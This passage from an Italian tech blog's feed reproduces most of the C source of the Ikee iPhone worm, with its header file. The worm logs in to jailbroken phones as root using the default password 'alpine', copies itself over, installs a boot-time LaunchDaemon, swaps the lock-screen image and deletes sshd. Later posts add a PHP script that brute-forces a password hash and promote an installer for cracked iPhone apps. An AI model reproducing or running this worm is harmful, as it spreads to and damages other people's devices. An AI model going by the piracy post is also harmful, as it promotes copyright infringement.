        FD_SET(soc, &myset);
        if (select(soc+1, NULL, &myset, NULL, &tv) > 0) {
            lon = sizeof(int);
            getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
            if (valopt) {
              return -1;
            }
        }
        else {
            return -1; }
      }
      else { return -1; }
    }
    close(soc);
    return 0;
    // Set to blocking mode again...
    //arg = fcntl(soc, F_GETFL, NULL);
    //arg &= (~O_NONBLOCK);
    //fcntl(soc, F_SETFL, arg);
}

int checkHost(char *host)
{
    syslog(LOG_DEBUG, host);
    FILE *in;
    extern FILE *popen();
    char buff[512];
    char *execLine;
    asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);
    if (!(in = popen(execLine, "r"))) {
        printf("Error is sshpass there?");
        return -1;
    }
    while (fgets(buff, 2, in) != NULL ) {
        if (strcmp(buff, "99"))
            return 0;
    }
    pclose(in);
    return -1; // NOT VULN
}

int runCommand(char* command, char *host)
{
    FILE *in;
    extern FILE *popen();
    char buff[512];
    char *execLine;
    // Really am to lazy to check this but im piling comands as so
    // command1; command2; command3; echo 99
    // my belief is that if for instance command2 dies we wont hit the echo 99
    // which will make us return -1
    asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'",VULN_PASS, host, command);
    if (!(in = popen(execLine, "r"))) {
        printf("Error is sshpass there?");
        return -1;
    }
    while (fgets(buff, 2, in) != NULL ) {
        if (strcmp(buff, "99"))
            return 0;
    }
    pclose(in);
    return -1;
}

int prunCommand(char* command, char *host)
{
    FILE *in;
    extern FILE *popen();
    char buff[512];
    char *execLine;
    asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'",VULN_PASS, host, command);
    if (!(in = popen(execLine, "r"))) {
        printf("Error is sshpass there?");
        return -1;
    }
    while (fgets(buff, sizeof(buff), in) != NULL ) {
        printf("%s",buff);
    }
    pclose(in);
    return -1;
}

int CopyFile(char* src, char* dst, char* host)
{
    FILE *in;
    extern FILE *popen();
    char buff[512];
    char *execLine;
    asprintf(&execLine, "sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s", VULN_PASS, src, host, dst);
    if (!(in = popen(execLine, "r"))) {
        printf("Error is sshpass there?");
        return -1;
    }
    while (fgets(buff, sizeof(buff), in) != NULL ) {}
    asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'", VULN_PASS, host, dst);
    if (!(in = popen(execLine, "r"))) {
        printf("Error is sshpass there?");
        return -1;
    }
    while (fgets(buff, 2, in) != NULL ) {
        if (strcmp(buff, dst))
            return 0;
    }
    pclose(in);
    return -1;
}

int ChangeOnBoot()
{
    FILE *in;
    extern FILE *popen();
    if (!(in = popen("cp /var/log/youcanbeclosertogod.jpg /var/mobile/Library/LockBackground.jpg", "r"))) {
        return -1;
    }
    return 0;
}

int KillSSHD()
{
    FILE *in;
    extern FILE *popen();
    if (!(in = popen("rm -f /usr/sbin/sshd; killall sshd", "r"))) {
        return -1;
    }
    return 0;
}

int infectHost(char *host)
{
    // Copy myself to them
    // run as startup
    if (runCommand("uname -n", host) == 0)
    {
        //printf("\n\r - Infecting: ");
        prunCommand("uname -n", host);
        prunCommand("rm /bin/sshpass", host);
        prunCommand("rm /bin/poc-bbot", host);
        //prunCommand("killall poc-bbot", host);
        if (CopyFile("/bin/poc-bbot", "/bin/poc-bbot", host) == 0 && CopyFile("/bin/sshpass", "/bin/sshpass", host) == 0)
        {
            //printf(" - Replicated successfully");
            prunCommand("rm /var/mobile/Library/LockBackground.jpg; echo \"\r\n - Removed old background\"", host);
            // Revision 3 - idea from nevermore!
            // This way dipshits wont delete my stuff
            CopyFile("/var/log/youcanbeclosertogod.jpg", "/var/mobile/Library/LockBackground.jpg", host);
            CopyFile("/var/log/youcanbeclosertogod.jpg", "/var/log/youcanbeclosertogod.jpg", host);
            //CopyFile("/var/mobile/Library/LockBackground.jpg", "/var/mobile/Library/LockBackground.jpg", host); // We aren't
installing an app.

            //printf(" - Background set (ast.jpg).");
            CopyFile("/System/Library/LaunchDaemons/com.ikey.bbot.plist", "/System/Library/LaunchDaemons/com.ikey.bbot.plist",
host);
            prunCommand("launchctl load /System/Library/LaunchDaemons/com.ikey.bbot.plist", host);
            // I didn't want to have to do this.
            prunCommand("rm -f /Library/LaunchDaemons/com.openssh.sshd.plist; launchctl unload
/Library/LaunchDaemons/com.openssh.sshd.plist", host);
            prunCommand("killall sshd", host);
            //printf("\n\r - Program set to startup on boot");
            //prunCommand("reboot", host)
            //printf("\n\r - Rebooting phone!");
            //CopyFile("ngtgyu.m4r", "/var/mobile/ngtgyu.m4r", host);
            //printf("\n\r - Ringtone set (ngtgyu.m4r).");
        }
    }
    return 0;
}

// END

Dal blog CK’s IT ecco invece il file main.h mancante:

# include <sys/fcntl.h>
# include <stdio.h>
# include <stdlib.h>
# include <sys/time.h>
# include <unistd.h>
# include <sys/types.h>
# include <sys/socket.h>
# include <netinet/in.h>
# include <netdb.h>
# include <arpa/inet.h>
# include <syslog.h>
# include <errno.h>
# include <ifaddrs.h>
# include <string.h>

# define MAX_NUM 24
# define VULN_PASS "alpine"

void scanner (char * ipRange);
int scanHost (char * host);
int checkHost (char * host);
int RunCommand (char * comando, char * host);
int prunCommand (char * comando, char * host);
int CopyFile (char * src, char * dst, char * host);
int ChangeOnBoot ();
int KillSSHD ();
int infectHost (char * host);
char * randHost (void);
int GET_LOCK (void);
char * getAddrRange ();
int tokenise (input char [], char * token [], char * SPL);
]]> http://www.pcexpert-blog.com/2010/01/codice-sorgente-di-ikee-il-primo-worm-per-iphone.html/feed 0 Backtrack 4: Video della versione finale in azione durante l’esecuzione di un exploit Adobe 0day http://www.pcexpert-blog.com/2009/12/backtrack-4-video-della-versione-finale-in-azione-durante-lesecuzione-di-un-exploit-adobe-0day.html http://www.pcexpert-blog.com/2009/12/backtrack-4-video-della-versione-finale-in-azione-durante-lesecuzione-di-un-exploit-adobe-0day.html#comments Wed, 16 Dec 2009 13:45:36 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1536

Il team di svulippo di BackTrack ci informa, direttamente dal blog ufficiale, che è costantemente al lavoro della quarta release finale della più nota distro di penetration testing. Il

]]> backtrack 4 Final

Il team di svulippo di BackTrack ci informa, direttamente dal blog ufficiale, che è costantemente al lavoro della quarta release finale della più nota distro di penetration testing. Il rilascio di Backtrack 4 è infatti previsto per fine mese. A questo indirizzo possiamo trovare informazioni su tutti i bug risolti e le principali novità introdotte in questa nuova release.
Infine il team ha rilascito un video che mostra tutta la potenza della loro distro nell’eseguire il recente exploit 0day individuato su Adobe Reader.
Ecco il link al video.

]]> http://www.pcexpert-blog.com/2009/12/backtrack-4-video-della-versione-finale-in-azione-durante-lesecuzione-di-un-exploit-adobe-0day.html/feed 1 Script PHP per recuperare una password effettuando un brute force del suo hash http://www.pcexpert-blog.com/2009/11/script-php-per-recuperare-una-password-effettuando-un-brute-force-del-suo-hash.html http://www.pcexpert-blog.com/2009/11/script-php-per-recuperare-una-password-effettuando-un-brute-force-del-suo-hash.html#comments Sat, 28 Nov 2009 14:56:34 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1474 Sul sito Eternalrise ho trovato un interessantissimo script in grado di recuperare una password effettuando un brute force del suo hash. L’autore spiega che il suo script è stato

]]> php_code
Sul sito Eternalrise ho trovato un interessantissimo script in grado di recuperare una password effettuando un brute force del suo hash. L’autore spiega che il suo script è stato scritto per PHP5 ma è possibile farlo funzionare anche sui web server dove vi è installato PHP4 semplicemente modificando la funzione hash() con md5().

<?php
/*
 * Thanks to Robert Green for this script he wrote in python
 * http://www.rbgrn.net/blog/2007/09/how-to-write-a-brute-force-password-cracker.html
 * I took what we wrote and ported this to PHP
 *
 * This script was written for PHP 5, but should work with
 * PHP 4 if the hash() function is replaced with md5() or something else
 */

#########################################################
/*                   Configuration                     */

// this is the hash we are trying to crack
define('HASH', '098f6bcd4621d373cade4e832627b4f6');

// algorithm of hash
// see http://php.net/hash_algos for available algorithms
define('HASH_ALGO', 'md5');

// max length of password to try
define('PASSWORD_MAX_LENGTH', 4);

// available characters to try for password
// uncomment additional charsets for more complex passwords
$charset = 'abcdefghijklmnopqrstuvwxyz';
//$charset .= '0123456789';
//$charset .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
//$charset .= '~`!@#$%^&*()-_\/\'";:,.+=<>? ';
#########################################################
$charset_length = strlen($charset);

function check($password)
{
	if (hash(HASH_ALGO, $password) == HASH) {
		echo 'FOUND MATCH, password: '.$password."\r\n";
		exit;
	}
}

function recurse($width, $position, $base_string)
{
	global $charset, $charset_length;

	for ($i = 0; $i < $charset_length; ++$i) {
		if ($position  < $width - 1) {
			recurse($width, $position + 1, $base_string . $charset[$i]);
		}
		check($base_string . $charset[$i]);
	}
}

echo 'target hash: '.HASH."\r\n";
recurse(PASSWORD_MAX_LENGTH, 0, '');

echo "Execution complete, no password found\r\n";

?>
]]> http://www.pcexpert-blog.com/2009/11/script-php-per-recuperare-una-password-effettuando-un-brute-force-del-suo-hash.html/feed 4 Rilasciato Install0us 2.5 per installare le app crackate (.ipa) direttamente dall’iphone http://www.pcexpert-blog.com/2009/11/rilasciato-install0us-2-5-per-installare-le-app-crackate-ipa-direttamente-dalliphone.html http://www.pcexpert-blog.com/2009/11/rilasciato-install0us-2-5-per-installare-le-app-crackate-ipa-direttamente-dalliphone.html#comments Tue, 10 Nov 2009 21:29:12 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1360 install0us2.5

Finalmente è stata rilasciata la nuova versione ufficiale di Install0us e, precisamente, stiamo parlando della versione 2.5. Per i pochi che ancora non sanno di cosa sto parlando, il software in questione ci permetterà di installare, direttamente dal nostro iPhone, tutte le applicazioni con estensione .ipa (crackate) senza dover effettuare la sincronizzazione da iTunes.
Per installare la nuova versione ci basterà aggiungere a cydia il seguente repository: http://cydia.install0us.com

]]> http://www.pcexpert-blog.com/2009/11/rilasciato-install0us-2-5-per-installare-le-app-crackate-ipa-direttamente-dalliphone.html/feed 0